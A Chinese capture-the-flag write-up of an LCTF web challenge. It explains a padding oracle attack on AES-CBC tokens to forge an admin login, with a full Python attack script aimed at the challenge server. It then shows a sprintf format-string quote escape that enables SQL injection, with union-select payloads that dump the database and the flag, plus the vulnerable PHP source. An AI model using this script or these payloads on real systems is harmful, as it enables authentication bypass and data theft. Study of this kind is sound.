LCTF的一道padding oracle攻击+sprintf格式化字符串导致的SQL注入

http://111.231.111.54/
泄露了两个源码
.login.php.swp .admin.php.swp 源码丢在最下面,可用vim -r恢复

第一次接触padding oracle,这题能做出来,真的是要感谢我的朋友Pr0ph3t给我的指点

结合这道题,讲解一下padding oracle的攻击方式

题目大概是这样的逻辑:

函数一:get_identity()

image.png

只有当你以一个账号密码成功登陆后,才会进入get_identity(),此时会生成一个随机的token,然后采用aes-128-cbc的加密方式,用这个随机生成的token和密钥,循环加密生成一个$id,如果生成的$id=admin,那你就有session['isadmin'],所以用随机token,加密得到admin这个id的概率是非常小的,所以基本上所有用账号密码的用户登陆都是guest

那管理员怎么登陆呢?对了,他不用账号密码,用一个特定的token来登陆,就是下面的函数 test_identity()

image.png

管理员直接传个特定的token,然后就会被后端的密钥解密,一解密得到的 id 就是admin,就认证成功了。

这个特定的token其实很容易得到,直接用密钥和admin这个id,解密即可生成

但是如果我们不知道密钥,那就需要用padding oracle攻击,来得到这个管理员特定的token,详细的原理可参考以下链接
http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/
http://www.jianshu.com/p/ad8bdd87e131

这里只讲解攻击方式和大致原理:

  • 不断用admin和admin去登陆,得到很多token,记住这里的admin,admin不是管理员,可以把它认为是一个很普通的账号,真正的管理员是用token登陆的,这个逻辑当时纳闷了我好久。。。。

  • 用登陆得到的很多token,模仿管理员直接用这些token去访问admin.php,那么就会进入test_identity()函数,进行解密操作,这时候的解密,其实就是将middle和IV(token) 逐位异或,如果能符合padding规则,就会生成一个明文,然后拿这个明文hex解码看看是不是admin这个id,是的话就认证成功,不是的话就认证失败


    image.png
  • 所以,如果padding失败,服务器就会返回500错误和error!,原因是这个解密函数解密出错,我们不断获取token去进行padding oracle攻击,直到后端可以正常解密出一个明文,并且不会报错,即使它不是admin,这时候我们就能得到middle的值

  • 我们拿middle,去和admin这个id异或,就生成了admin的token!!!

  • 或者我们可以随便拿一个admin,admin登陆获得的旧token,然后和middle异或,得到它的明文(id),然后 旧token ^ 旧id ^ admin(新id) = 新IV (admin的token) 数学推导如下

    image.png

    其实这也就是CBC翻转的原理,有时候你知道你的token和解密后对应的明文id,你就能把这两个与admin这个id 三者异或,就能得到admin的token,可参考该文章
    http://www.jianshu.com/p/7f171477a603

  • Padding Oracle Attack的关键在于:

  1. 攻击者能够获知并修改IV
  2. 攻击者能够获知解密的结果是否符合padding,如服务器是否报错
  • 至此废话完了,一口气敲完的,若写错了请指正,Orz

献上脚本,修改自 http://blog.csdn.net/qq_19876131/article/details/61918399

#coding:utf8
import requests
import base64

url='http://111.231.111.54/login.php'
N=16
old_token = 'eHNkaHkxSkxQbEplanFKbQ=='

def inject_token(token):
    header={"Cookie":"PHPSESSID=qv6iuvrs0bh3g3c0688ss2cb86;token="+token}
    print header
    result=requests.get(url,headers=header)
    return result
def xor(a, b):
    return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])

def pad(string,N):
    l=len(string)
    if l!=N:
        return string+chr(N-l)*(N-l)

def padding_oracle(N):
    get=""
    for i in xrange(1,N+1):
        for j in xrange(0,256):
            padding=xor(get,chr(i)*(i-1))
            c=chr(0)*(16-i)+chr(j)+padding
            result=inject_token(base64.b64encode(c))
            print result.content
            if "Error!" not in result.content:
                get=chr(j^i)+get
                break

    return get

while 1:
    middle1=padding_oracle(N)
    print "\n"
    if(len(middle1)+1==16):
        for i in xrange(0,256):
            middle=chr(i)+middle1
            print "token:"+old_token
            print "middle:"+middle
            plaintext=xor(middle,old_token);
            print "plaintext:"+plaintext
            des=pad('admin',N)
            tmp=""
            print des.encode("base64")
            for i in xrange(16):
                tmp+=chr(ord(old_token[i])^ord(plaintext[i])^ord(des[i]))
            print tmp.encode('base64')
            result=inject_token(base64.b64encode(tmp))
            if "admin" in result.content:
                print result.content
                print "success"
                exit()
成功以管理员身份,登陆admin.php,并可以传入参数id和title
image.png

乍看这两个参数都是做了预处理,再带入sql语句查询
但是看到sprintf(),是一个格式化字符串函数,传入的字符可覆盖自身参数

可参考文章
https://paper.seebug.org/386/
http://www.cnblogs.com/test404/p/7821884.html
https://www.seceye.cn/1291.html

image.png

当我们传入 id=3&title=%1$ 'or(1)#

这时候,因为后端将 '转译成 \' 形成id=3&title=%1$ \'or(1)#
由于sprintf()的作用,会吞掉$后面的两个字节,也就是 空格和\,导致单引号逃逸成功,不会被转译

image.png

所以这里就能成功注入了,而且可以union注入,记得对payload进行url编码,毕竟太多乱七八糟的符号

给出相关payload(未url编码)和截图

id=3&title=%1$ 'union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname,@@datadir)#

id=3&title=%1$ 'union select 1,2,group_concat(distinct(table_name)) from information_schema.tables where table_schema=0x77656231#

id=3&title=%1$ 'union select 1,2,group_concat(distinct(column_name))  from information_schema.columns where table_name=0x6b6579 and table_schema=0x77656231#

id=3&title=%1$ 'union select 1,2,group_concat(distinct(f14g)) from web1.key#
image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

后端源码
login.php

<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');
function show_page(){
    echo '省略';
}
function get_random_token(){
    $random_token = '';
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    for($i = 0; $i < 16; $i++){
        $random_token .= substr($str, rand(1, 61), 1);
    }
    return $random_token;
}
function get_identity(){
    global $id;
    $token = get_random_token();
    $c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("token", base64_encode($token));
    if($id === 'admin'){
        $_SESSION['isadmin'] = 1;
    }else{
        $_SESSION['isadmin'] = 0;
    }
}
function test_identity(){
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        $token = base64_decode($_COOKIE["token"]);
        if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
            if ($u === 'admin') {
                $_SESSION['isadmin'] = 1;
                return 1;
            }
        }else{
            die("Error!");
        }
    }
    return 0;
}
if(isset($_POST['username'])&&isset($_POST['password'])){
    $username = mysql_real_escape_string($_POST['username']);
    $password = $_POST['password'];
    $result = mysql_query("select password from users where username='" . $username . "'", $con);
    $row = mysql_fetch_array($result);
    if($row['password'] === md5($password)){
        get_identity();
        header('location: ./admin.php');
    }else{
        die('Login failed.');
    }
}else{
    if(test_identity()){
        header('location: ./admin.php');
    }else{
        show_page();
    }
}
?>

admin.php

<?php
error_reporting(0);
session_start();
include('config.php');
if(!$_SESSION['isadmin']){
    die('You are not admin');
}
if(isset($_GET['id'])){
    $id = mysql_real_escape_string($_GET['id']);
    if(isset($_GET['title'])){
        $title = mysql_real_escape_string($_GET['title']);
        $title = sprintf("AND title='%s'", $title);
    }else{
        $title = '';
    }
    $sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
    $result = mysql_query($sql,$con);
    $row = mysql_fetch_array($result);
    if(isset($row['title'])&&isset($row['content'])){
        echo "<h1>".$row['title']."</h1><br>".$row['content'];
        die();
    }else{
        die("This article does not exist.");
    }
}
?>

走过路过,欢迎纠错

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,752评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,100评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,244评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,099评论 1 286
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,210评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,307评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,346评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,133评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,546评论 1 306
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,849评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,019评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,702评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,331评论 3 319
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,030评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,260评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,871评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,898评论 2 351

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,644评论 18 139
  • 背景: 阅读新闻 12C CDB模式下RMAN备份与恢复 [日期:2016-11-29] 来源:Linux社区 作...
    阳屯okyepd阅读 3,369评论 0 7
  • 文章分类 后台文章分类列表页模板导的详细步骤建立数据表blog_category,并添加相应的文章字段使用php ...
    JoyceZhao阅读 1,698评论 0 12
  • 分组密码每次只能处理加密固定长度的分组,但是我们加密的明文可能会超过分组密码处理的长度。这时便需要对所有分组进行迭...
    查无此人asdasd阅读 1,182评论 0 0
  • 听前思考 在信息化的时代,应该如何阅读?哪些书适合快速粗读,哪些书适合全盘精读?做读书笔记有哪些方法? 一、什么是...
    Summerfy阅读 504评论 0 0